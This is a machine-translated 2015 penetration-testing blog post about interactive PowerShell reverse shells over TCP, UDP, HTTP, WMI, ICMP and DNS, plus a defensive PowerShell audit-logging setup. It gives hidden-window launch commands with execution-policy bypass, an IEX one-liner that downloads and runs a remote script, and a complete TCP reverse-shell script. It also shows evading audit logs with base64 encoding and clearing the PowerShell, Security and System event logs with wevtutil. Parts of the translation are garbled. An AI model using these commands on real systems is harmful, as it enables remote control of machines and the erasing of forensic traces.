Mickey · 2015/05/20″

0 x00 preface

When I saw the http://zone.wooyun.org/content/20429 DM_ ox hair, I can’t be calm once in a mood for a long time, this should belong to my essence + WB, took his starters, this doll is really hateful, hateful: -), and then DM_ cow sent me some information for me to learn, I wrote this article, just entry, there must be mistakes, I hope friends to discuss, point out.

This time Labofapenetrationtester is released in the form of “Week of Powershell shell”, that is, one piece per day, a total of five pieces, respectively

Day 1 - Interactive PowerShell shells over TCP
Day 2 - Interactive PowerShell shells over UDP
Day 3 - Interactive PowerShell shells over HTTP/HTTPS
Day 4 - Interactive PowerShell shells with WMI
Day 5 - Interactive PowerShell shells over ICMP and DNS
Copy the code

0 x01 three days before

For TCP,UDP,HTTP, and HTTPS packets in the first three days, you can upload the PS1 script to the target and execute it

#! bash D:\>PowerShell.exe -ep Bypass -File d:\Invoke-PowerShellUdp.ps1Copy the code

I’m going to use a different protocol, and I’m going to use UDP, as shown here

Listen on the port first, and then rebound. Otherwise, an error will be reported.

For real environment attacks, I often add the -nologo-noninteractive -noprofile-windowstyle Hidden parameter as follows

#! bash PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File d:\Invoke-PowerShellUdp.ps1Copy the code

Another way to play is if the other party is connected to the Internet, you can directly use IEX to download the remote PS1 script and execute it.

#! bash IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')Copy the code

0x02 Day 4 – Interactive PowerShell shells with WMI

This is usually only used on the internal network, can completely replace the psexec, the author here uses the namespace to save the WMI execution results, and finally retrieve the return display results is very good idea, solve the WMI remote direct command does not echo the problem. Of course, to run this script, you need administrator privileges and enter the other party’s account.

0x03 Day 5 – Interactive PowerShell shells over ICMP and DNS

If this script is run using ICMP, it is only necessary to note that it is executed locally first

#! bash[email protected]:~/Desktop# sysctl -w net.ipv4.icmp_echo_ignore_all=1
Copy the code

Otherwise, the rebound will not work, I believe that the students who have used ICMPSH know.

Later a foreign BLOG said that if you do the following configuration, you can find the Powershell attack behavior and see the attack code

Configuration requirements are as follows:

  1. Create a profile.ps1 in C:\Windows\System32\WindowsPowerShell\v1.0

Fill in the following

# !bash    
CD D:\ $LogCommandHealthEvent = $true $LogCommandLifecycleEvent = $true
Copy the code
  1. Right click on profile.ps1, click “Security” -> “Advanced” -> “Audit” once, click the “Compile” button, add user “everyone”, and open the audit items as shown in the picture

  1. Since the log will become very large after doing so, increase the log capacity accordingly in order to encode rollback coverage, as shown in the figure

How do you get around that? Because he added a file audit to profile.ps1, the strategy of modifying or moving/deleting the file would not work.

After executing the rebound script, you can see the details by filtering events with eventID of 500 in the Windows PowerShell event class in the Event Viewer

#! Bash CommandLine = $client = New - Object System.Net.Sockets.TCPClient (" ", 8888); $stream = $client.GetStream(); [byte[]]$bytes = 0.. 255 | % {0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text language=".encoding"][/text]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()Copy the code

As shown in figure:

At first, I thought that the -noprofile option could bypass this limitation. After practice, I found that it was not possible, and I would still see it in the log. Then I combined with the -enc option to base64 encoding, as follows:


(CommandLine=) (CommandLine=) (CommandLine=) (CommandLine=) (CommandLine=) (CommandLine=) (CommandLine=)

The absolute way to do this, of course, is to run out of Powershell on your target

#! bash wevtutil cl "windows powershell" wevtutil cl "security" wevtutil cl "system"Copy the code

Of course, if the permission is low, there is no way 🙁

The benefits of using Powershell for attacks are obvious, eliminating the need to kill (in my tests), facilitating transport (when injected), and being built in (since Windows 7). But even if the administrator does not open the audit as above, there is still a trace by default, which will be discussed in the next article. Some friends like to infiltrate all add me to discuss, their own slow.

Reference article:

